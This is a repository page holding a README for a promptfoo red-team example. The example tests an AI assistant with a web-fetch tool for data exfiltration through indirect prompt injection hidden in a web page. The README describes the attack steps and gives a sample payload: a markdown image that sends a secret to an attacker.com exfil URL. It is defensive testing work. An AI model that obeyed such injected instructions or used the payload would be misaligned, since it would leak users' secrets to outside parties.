Files
wehub-resource-sync 0d3cb498a3
Deploy local.promptfoo.app / Deploy to Cloudflare Pages (push) Waiting to run
Test and Publish Multi-arch Docker Image / test (push) Waiting to run
Test and Publish Multi-arch Docker Image / build-docker-and-push-digests (map[digest-suffix:linux-amd64 platform:linux/amd64 runner:ubuntu-latest]) (push) Blocked by required conditions
Test and Publish Multi-arch Docker Image / build-docker-and-push-digests (map[digest-suffix:linux-arm64 platform:linux/arm64 runner:ubuntu-24.04-arm]) (push) Blocked by required conditions
Test and Publish Multi-arch Docker Image / merge-docker-digests (push) Blocked by required conditions
Test and Publish Multi-arch Docker Image / Attest Multi-arch Image (push) Blocked by required conditions
CI / Shell Format Check (push) Waiting to run
CI / Check Ruby (3.4) (push) Waiting to run
CI / CI Config (push) Waiting to run
CI / Test on Node ${{ matrix.node }} and ${{ matrix.os }}${{ matrix.shard && format(' (shard {0}/3)', matrix.shard) || '' }} (push) Blocked by required conditions
CI / Build on Node ${{ matrix.node }} (push) Blocked by required conditions
CI / Style Check (push) Waiting to run
CI / Generate Assets (push) Waiting to run
CI / Check Python (3.14) (push) Waiting to run
CI / Check Python (3.9) (push) Waiting to run
CI / Build Docs (push) Waiting to run
CI / Code Scan Action (push) Waiting to run
CI / Site tests (push) Waiting to run
CI / webui tests (push) Waiting to run
CI / Run Integration Tests (push) Waiting to run
CI / Run Smoke Tests (push) Waiting to run
CI / Go Tests (push) Waiting to run
CI / Share Test (push) Waiting to run
CI / Redteam (Production API) (push) Waiting to run
CI / Redteam (Staging API) (push) Waiting to run
CI / GitHub Actions Lint (push) Waiting to run
CI / Check Ruby (3.0) (push) Waiting to run
release-please / release-please (push) Waiting to run
release-please / build (push) Blocked by required conditions
release-please / publish-npm (push) Blocked by required conditions
release-please / publish-npm-backfill (push) Waiting to run
release-please / docker (push) Blocked by required conditions
release-please / publish-code-scan-action (push) Blocked by required conditions
release-please / attest-code-scan-action (push) Blocked by required conditions
Validate Renovate Config / Validate Renovate Configuration (push) Waiting to run
chore: import upstream snapshot with attribution
2026-07-13 13:24:08 +08:00
..

redteam-indirect-web-pwn (Red Team Data Exfiltration via Indirect Web Prompt Injection)

You can run this example with:

npx promptfoo@latest init --example redteam-indirect-web-pwn
cd redteam-indirect-web-pwn

Introduction

This example demonstrates how to test an AI assistant for data exfiltration vulnerabilities using promptfoo's indirect-web-pwn strategy.

The attack works by:

  1. Creating a web page with hidden prompt injection instructions
  2. Asking the AI assistant to fetch and summarize the page
  3. The injected instructions attempt to trick the model into encoding sensitive data into URL query parameters (e.g., markdown images like ![img](http://attacker.com/exfil?api=SECRET))

The custom provider (provider.js) simulates a realistic AI assistant with a web_fetch tool that actually fetches URLs, making it a valid target for this attack.

Setup

  1. Install dependencies:
npm install
  1. Set your OpenAI API key:
export OPENAI_API_KEY=your-api-key-here

Running

Run the full red team scan (generates test cases and evaluates) in one command:

npx promptfoo@latest redteam run

View results:

npx promptfoo@latest view

What to Look For

  • FAIL results indicate the model attempted to exfiltrate data by embedding values in URL query parameters or markdown images
  • PASS results indicate the model refused the injection or did not attempt exfiltration